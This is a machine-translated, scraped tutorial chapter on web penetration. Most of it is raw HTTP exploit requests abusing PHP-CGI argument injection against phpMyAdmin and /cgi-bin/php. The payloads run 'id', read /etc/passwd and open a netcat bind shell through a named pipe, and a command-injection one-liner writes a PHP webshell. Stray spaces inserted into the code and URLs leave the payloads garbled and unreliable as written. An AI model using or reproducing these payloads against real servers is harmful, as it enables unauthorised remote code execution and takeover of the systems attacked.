Chapter XII WEB penetration

Others 2019-09-03 04:20:08 views: null

Go to the Tools Usage: Common tools Introduction

Manual vulnerability mining

• default installation
• Windows default installation vulnerability
  • phpMyAdmin / Setup
  • Ubuntu / Debian default cgi-install PHP5
• Direct access / cgi-bin / php5 and / cgi-bin / php (not climb out of the catalog)
POST HTTP: // the HTTP 192.168.20.10/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input / 1.1
the Host: 192.168.20.10
<? PHP
passthru ( 'ID');
Die ();
?>

 

• PHP反弹shell
  • /usr/share/webshells/php/php-reverse-shell.php
• File
• Whereis
  • Ifconfig
• 写入webshell
  •  ;echo "<?php \$cmd = \$_GET["cmd"];system(\$cmd);?>" > /var/www/3.php

 

 

• POST / cgi-bin / php ?% 2D% 64 +% 61% 6C% 6C% 6F% 77% 5F% 75% 72% 6C% 5F% 69% 6E% 63% 6C% 75% 64% 65% 3D % 6F% 6E +% 2D% 64 +% 73% 61% 66% 65% 5F% 6D% 6F% 64% 65% 3D% 6F% 66% 66 +% 2D% 64 +% 73% 75% 68% 6F% 73% 69% 6E% 2E% 73% 69% 6D% 75% 6C% 61% 74% 69% 6F% 6E% 3D% 6F % 6E +% 2D% 64 +% 64% 69% 73% 61% 62% 6C % 65% 5F% 66% 75% 6E% 63% 74% 69% 6F% 6E% 73% 3D% 22% 22 +% 2D% 64 +% 6F% 70% 65% 6E% 5F
% 62% 61% 73 % 65% 64% 69% 72% 3D% 6E% 6F% 6E % 65 +% 2D% 64 +% 61% 75% 74% 6F% 5F% 70% 72% 65% 70% 65% 6E% 64% 5F % 66% 69% 6C% 65% 3D% 70% 68% 70% 3A% 2F% 2F% 69% 6E% 70% 75% 74 +% 2D% 64 +% 63% 67% 69% 2E% 66% 6F % 72% 63% 65% 5F% 72% 65% 64% 69% 72% 65% 63% 74% 3D% 30 +% 2D% 64 +% 63% 67% 69% 2E% 72% 65% 64% 69 % 72% 65% 63% 74% 5F% 73% 74% 61% 74% 75% 73% 5F% 65% 6E% 76% 3D% 30 +
% 2D% 6E HTTP / 1.1
• Host: 123
<? php
 echo system ( 'cat / etc / passwd ');
?>

 


POST / cgi-bin / php?% 2D% 64 +% 61% 6C% 6C% 6F% 77% 5F% 75% 72% 6C% 5F% 69% 6E
% 63% 6C% 75% 64% 65% 3D % 6F% 6E +% 2D% 64 +% 73% 61% 66% 65% 5F% 6D% 6F% 64% 65% 3D
% 6F% 66% 66 +% 2D% 64 +% 73% 75% 68% 6F% 73% 69% 6E% 2E% 73% 69% 6D% 75% 6C
% 61% 74% 69% 6F% 6E% 3D% 6F % 6E +% 2D% 64 +% 64% 69% 73% 61% 62% 6C % 65% 5F
% 66% 75% 6E% 63% 74% 69% 6F% 6E% 73% 3D% 22% 22 +% 2D% 64 +% 6F% 70% 65% 6E% 5F
% 62% 61% 73 % 65% 64% 69% 72% 3D% 6E% 6F% 6E % 65 +% 2D% 64 +% 61% 75% 74% 6F% 5F
% 70% 72% 65% 70% 65% 6E% 64% 5F % 66% 69% 6C% 65% 3D% 70% 68% 70% 3A% 2F% 2F% 69% 6E
% 70% 75% 74 +% 2D% 64 +% 63% 67% 69% 2E% 66% 6F % 72% 63% 65% 5F
% 72% 65% 64% 69% 72% 65% 63% 74% 3D% 30 +% 2D% 64 +% 63% 67% 69% 2E
% 72% 65% 64% 69 % 72% 65% 63% 74% 5F% 73% 74% 61% 74% 75% 73% 5F% 65% 6E% 76% 3D% 30 +
% 2D% 6E HTTP / 1.1
• Host: 192.168.20.5
• < ? php
• system('mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe');
•?>

 

Guess you like

Origin www.cnblogs.com/steven9898/p/11448844.html
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com